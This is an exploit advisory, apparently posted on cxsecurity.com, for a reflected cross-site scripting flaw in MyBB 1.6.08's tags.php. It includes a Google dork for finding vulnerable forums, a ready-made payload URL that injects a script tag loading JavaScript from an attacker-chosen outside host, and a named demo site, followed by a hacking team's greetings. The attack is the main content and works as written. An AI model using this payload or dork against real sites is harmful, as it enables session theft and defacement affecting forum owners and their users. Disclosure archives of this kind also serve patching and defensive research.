MyBB 1.6.08 Xss Vulnerability

2013.07.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################# # In The Name OF Allah # wWw.ShiShe.In ################################# # Exploit Title : MyBB 1.6.08 Xss Vulnerability # Author : ShiShe Digital Security Team # Discovered By : RD.H@CKER # Home : http://wWw.ShiShe.In - http://Shishe.In/forums/forum.php # Software Link : http://www.mybb.com # Security Risk : High # Tested on : Windows # Dork : intext:&#1606;&#1587;&#1582;&#1607;: 1608 MyBB, &#169; 2002-2013 MyBB Group ################################# # Exploit : http://target.com/tags.php?tag="><script src%3d//yourhost.com/yourdef></script> # DeMo : # http://www.cXterfun.com/tags.php?tag= ################################# # Greats : Hacker.Ramin - Mr.Online - Mehdi Spik - BlaCk_N3T - Adib Silent - Amir Hacker - Rouzbeh King # Poya21 - Crazy Boy - Alireza021 - Det3ct0r - MrRamtin - Peyman Genius - Amirio - Mohammad # Alireza Darksun - TumRus - nIcOlAs - Mehdi Rato - Pooria Wilson - Moji Hunter - FoXSec # & All MeMBeRs OF SST [ ShiShe.In ] ################################# # Tnx To : PacketstormSecurity.Org - Cxsecurity.Com - 1337day.com - exploit-db.com #################################

References:

http://Shishe.In/forums/forum.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top